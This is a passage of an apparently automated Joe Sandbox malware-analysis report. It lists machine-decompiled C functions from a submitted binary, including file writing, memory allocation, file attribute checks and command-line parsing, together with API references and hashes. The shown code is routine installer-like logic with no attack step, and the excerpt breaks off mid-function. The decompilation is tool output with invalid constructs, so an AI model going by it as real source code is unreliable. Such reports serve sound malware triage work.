                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61c4bdb1254a510e90ba68b4c0b96fc7534d98061442fd1176c012ac173e38fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98014BA3E125742BF32440298C88FB7561ECB96775F1B0336BDEAE72D1D664AC04B1E4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00FD4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				int _t12;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				struct HWND__* _t21;
                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 =  *0xfd858c; // 0x268
                                                                                                                                                                                                    				_t9 = E00FD3680(_t20);
                                                                                                                                                                                                    				if( *0xfd91d8 == 0) {
                                                                                                                                                                                                    					_push(_t24);
                                                                                                                                                                                                    					_t12 = WriteFile( *(0xfd8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t25 = _a12;
                                                                                                                                                                                                    						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    							_t14 =  *0xfd9400; // 0x4f75e
                                                                                                                                                                                                    							_t15 = _t14 + _t25;
                                                                                                                                                                                                    							 *0xfd9400 = _t15;
                                                                                                                                                                                                    							if( *0xfd8184 != 0) {
                                                                                                                                                                                                    								_t21 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xfd93f8, 0);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return _t9 | 0xffffffff;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00fd4ad5
                                                                                                                                                                                                    0x00fd4adb
                                                                                                                                                                                                    0x00fd4ae7
                                                                                                                                                                                                    0x00fd4aee
                                                                                                                                                                                                    0x00fd4b05
                                                                                                                                                                                                    0x00fd4b0d
                                                                                                                                                                                                    0x00fd4b14
                                                                                                                                                                                                    0x00fd4b1a
                                                                                                                                                                                                    0x00fd4b1c
                                                                                                                                                                                                    0x00fd4b21
                                                                                                                                                                                                    0x00fd4b2a
                                                                                                                                                                                                    0x00fd4b2f
                                                                                                                                                                                                    0x00fd4b31
                                                                                                                                                                                                    0x00fd4b39
                                                                                                                                                                                                    0x00fd4b54
                                                                                                                                                                                                    0x00fd4b54
                                                                                                                                                                                                    0x00fd4b39
                                                                                                                                                                                                    0x00fd4b2f
                                                                                                                                                                                                    0x00fd4b0f
                                                                                                                                                                                                    0x00fd4b0f
                                                                                                                                                                                                    0x00fd4b0f
                                                                                                                                                                                                    0x00fd4b5e
                                                                                                                                                                                                    0x00fd4ae9
                                                                                                                                                                                                    0x00fd4aed
                                                                                                                                                                                                    0x00fd4aed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FD369F
                                                                                                                                                                                                      • Part of subcall function 00FD3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36B2
                                                                                                                                                                                                      • Part of subcall function 00FD3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36DA
                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00FD4B05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                    • Opcode ID: b166729ff59ca13110001eca26f2186dd452002a0f927c0da3b1f74643bf65c2
                                                                                                                                                                                                    • Instruction ID: bcd33057305d02e52fdebb5e7bc2e0ffa8d329aeb3dd97a3cd360d2e520820d7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b166729ff59ca13110001eca26f2186dd452002a0f927c0da3b1f74643bf65c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2018031601209ABD7158F68EC05FA6776BBB94735F088227F939972E1CB70E812FB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                    				char* _t6;
                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				char* _t16;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				char* _t19;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = __ecx;
                                                                                                                                                                                                    				_t10 = __edx;
                                                                                                                                                                                                    				_t17 = __ecx;
                                                                                                                                                                                                    				_t1 = _t17 + 1; // 0xfd8b3f
                                                                                                                                                                                                    				_t12 = _t1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t4 =  *_t17;
                                                                                                                                                                                                    					_t17 = _t17 + 1;
                                                                                                                                                                                                    				} while (_t4 != 0);
                                                                                                                                                                                                    				_t18 = _t17 - _t12;
                                                                                                                                                                                                    				_t2 = _t18 + 1; // 0xfd8b40
                                                                                                                                                                                                    				if(_t2 < __edx) {
                                                                                                                                                                                                    					_t19 = _t18 + __ecx;
                                                                                                                                                                                                    					if(_t19 > __ecx) {
                                                                                                                                                                                                    						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                    						if( *_t8 != 0x5c) {
                                                                                                                                                                                                    							 *_t19 = 0x5c;
                                                                                                                                                                                                    							_t19 =  &(_t19[1]);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t6 = _a4;
                                                                                                                                                                                                    					 *_t19 = 0;
                                                                                                                                                                                                    					while( *_t6 == 0x20) {
                                                                                                                                                                                                    						_t6 = _t6 + 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return E00FD16B3(_t16, _t10, _t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0x8007007a;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00fd6592
                                                                                                                                                                                                    0x00fd6594
                                                                                                                                                                                                    0x00fd6596
                                                                                                                                                                                                    0x00fd6598
                                                                                                                                                                                                    0x00fd6598
                                                                                                                                                                                                    0x00fd659b
                                                                                                                                                                                                    0x00fd659b
                                                                                                                                                                                                    0x00fd659d
                                                                                                                                                                                                    0x00fd659e
                                                                                                                                                                                                    0x00fd65a2
                                                                                                                                                                                                    0x00fd65a4
                                                                                                                                                                                                    0x00fd65a9
                                                                                                                                                                                                    0x00fd65b2
                                                                                                                                                                                                    0x00fd65b6
                                                                                                                                                                                                    0x00fd65ba
                                                                                                                                                                                                    0x00fd65c3
                                                                                                                                                                                                    0x00fd65c5
                                                                                                                                                                                                    0x00fd65c8
                                                                                                                                                                                                    0x00fd65c8
                                                                                                                                                                                                    0x00fd65c3
                                                                                                                                                                                                    0x00fd65c9
                                                                                                                                                                                                    0x00fd65cc
                                                                                                                                                                                                    0x00fd65d2
                                                                                                                                                                                                    0x00fd65d1
                                                                                                                                                                                                    0x00fd65d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd65dc
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(00FD8B3E,00FD8B3F,00000001,00FD8B3E,-00000003,?,00FD60EC,00FD1140,?), ref: 00FD65BA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                    • Opcode ID: 17cc9199468852f9748399d50b90b9905eca13661b6d6b0dec997dee1b0670b9
                                                                                                                                                                                                    • Instruction ID: 95105e77f81a2362dbeec312816fa14a698ee1304015bde3cb620a7f49807db9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17cc9199468852f9748399d50b90b9905eca13661b6d6b0dec997dee1b0670b9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F04C335042509BD731491DB884B6ABFDF9B96360F2D016FF8DAC3309CA658C85A7A4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00FD621E() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					0x4f0 = 2;
                                                                                                                                                                                                    					_t9 = E00FD597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00FD44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					_t9 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00fd6229
                                                                                                                                                                                                    0x00fd6230
                                                                                                                                                                                                    0x00fd6247
                                                                                                                                                                                                    0x00fd626a
                                                                                                                                                                                                    0x00fd6272
                                                                                                                                                                                                    0x00fd6249
                                                                                                                                                                                                    0x00fd6255
                                                                                                                                                                                                    0x00fd625f
                                                                                                                                                                                                    0x00fd6264
                                                                                                                                                                                                    0x00fd6264
                                                                                                                                                                                                    0x00fd6284

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FD623F
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                    • Opcode ID: 5c0c9087e95bfb13ba5860d26fa618838206f662675e5ef0fa58490153c5385c
                                                                                                                                                                                                    • Instruction ID: 2c520c308e881257ef9741a7244aff6bdfca085503314df629c9df47c4fb2b63
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c0c9087e95bfb13ba5860d26fa618838206f662675e5ef0fa58490153c5385c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24F0E2B0704208ABEB50EB74CD06FBE33AEDB44700F44006BB986D6282EDB89D84A650
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD4B60(signed int _a4) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 = _a4 * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t15 + 0xfd8d64)) != 1) {
                                                                                                                                                                                                    					_t9 = FindCloseChangeNotification( *(_t15 + 0xfd8d74)); // executed
                                                                                                                                                                                                    					if(_t9 == 0) {
                                                                                                                                                                                                    						return _t9 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *((intOrPtr*)(_t15 + 0xfd8d60)) = 1;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0xfd8d60)) = 1;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0xfd8d68)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0xfd8d70)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0xfd8d6c)) = 0;
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00fd4b66
                                                                                                                                                                                                    0x00fd4b74
                                                                                                                                                                                                    0x00fd4b98
                                                                                                                                                                                                    0x00fd4ba0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4bac
                                                                                                                                                                                                    0x00fd4ba4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4ba4
                                                                                                                                                                                                    0x00fd4b78
                                                                                                                                                                                                    0x00fd4b7e
                                                                                                                                                                                                    0x00fd4b84
                                                                                                                                                                                                    0x00fd4b8a
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00FD4FA1,00000000), ref: 00FD4B98
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: bd2901d8c2c8ba7d6112bce05c1522d6b7aad3536582c7e28237d12751a8e9fd
                                                                                                                                                                                                    • Instruction ID: 286b37e4a328d4b00b8a1a1fb3fce53d7dc4845af97561524892b01ca0020085
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd2901d8c2c8ba7d6112bce05c1522d6b7aad3536582c7e28237d12751a8e9fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0FE31900B0C9F47619F3A8C02652BBE7AAE53A0314092F946ED22D0DB70A542FBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD66AE(CHAR* __ecx) {
                                                                                                                                                                                                    				unsigned int _t1;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                    				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                    					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00fd66b1
                                                                                                                                                                                                    0x00fd66ba
                                                                                                                                                                                                    0x00fd66c7
                                                                                                                                                                                                    0x00fd66bc
                                                                                                                                                                                                    0x00fd66be
                                                                                                                                                                                                    0x00fd66be

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00FD4777,?,00FD4E38,?), ref: 00FD66B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                    • Opcode ID: 6c044c15ef0d11cb4e591c514b88cb848a3d3f66bb5144552d9fb5427b97f881
                                                                                                                                                                                                    • Instruction ID: 62ae4be020c8ee81a70e7754fe00e0a2da466df65bafa9ecabc44157d51d5334
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c044c15ef0d11cb4e591c514b88cb848a3d3f66bb5144552d9fb5427b97f881
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CB09276622444426A2006356C295563942A6C123A7E85B92F032C02E0CA3EC846E008
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD4CA0(long _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00fd4caa
                                                                                                                                                                                                    0x00fd4cb1

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00FD4CAA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                    • Opcode ID: 8decd29ce61d56b4417c8e71e3c7b4ab1c170fa473271938d225911037c5b882
                                                                                                                                                                                                    • Instruction ID: 4f79fc54e229b3ebffc8fe707e800312546b5d99242e75a4d10f4de929bdd8f6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8decd29ce61d56b4417c8e71e3c7b4ab1c170fa473271938d225911037c5b882
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5B0123204420CB7CF002FE2EC0DF853F1EEBC4761F144041F60C45050CA729410969A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD4CC0(void* _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00fd4cc8
                                                                                                                                                                                                    0x00fd4ccf

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                    • Opcode ID: fe5a991756ffdf542858ccdb34240c31bc07e2da446fb991a810af5d278fff5d
                                                                                                                                                                                                    • Instruction ID: aa4b9dab4cf5ff8e53421c9349b0796fffaac6a66f65c193bec88f8dfb821aae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe5a991756ffdf542858ccdb34240c31bc07e2da446fb991a810af5d278fff5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7EB0123100010CB78F002B62EC0C8453F1ED6C42607000051F50C41021CB3398119589
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E00FD5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				CHAR* _v265;
                                                                                                                                                                                                    				char _v266;
                                                                                                                                                                                                    				char _v267;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				CHAR* _v272;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				CHAR* _t69;
                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				char _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				void* _t119;
                                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				void* _t132;
                                                                                                                                                                                                    				void* _t142;
                                                                                                                                                                                                    				signed int _t143;
                                                                                                                                                                                                    				CHAR* _t144;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                    				char _t155;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				void* _t162;
                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                    				char _t167;
                                                                                                                                                                                                    				char _t170;
                                                                                                                                                                                                    				CHAR* _t173;
                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                    				intOrPtr* _t183;
                                                                                                                                                                                                    				intOrPtr* _t192;
                                                                                                                                                                                                    				CHAR* _t199;
                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                    				CHAR* _t201;
                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                    				void* _t206;
                                                                                                                                                                                                    				int _t209;
                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                    				void* _t212;
                                                                                                                                                                                                    				void* _t213;
                                                                                                                                                                                                    				CHAR* _t218;
                                                                                                                                                                                                    				intOrPtr* _t219;
                                                                                                                                                                                                    				intOrPtr* _t220;
                                                                                                                                                                                                    				signed int _t221;
                                                                                                                                                                                                    				signed int _t223;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t173 = __ecx;
                                                                                                                                                                                                    				_t61 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                    				_t209 = 1;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					while(_t209 != 0) {
                                                                                                                                                                                                    						_t67 =  *_t173;
                                                                                                                                                                                                    						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                    							_t173 = CharNextA(_t173);
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v272 = _t173;
                                                                                                                                                                                                    						if(_t67 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t69 = _v272;
                                                                                                                                                                                                    							_t177 = 0;
                                                                                                                                                                                                    							_t213 = 0;
                                                                                                                                                                                                    							_t163 = 0;
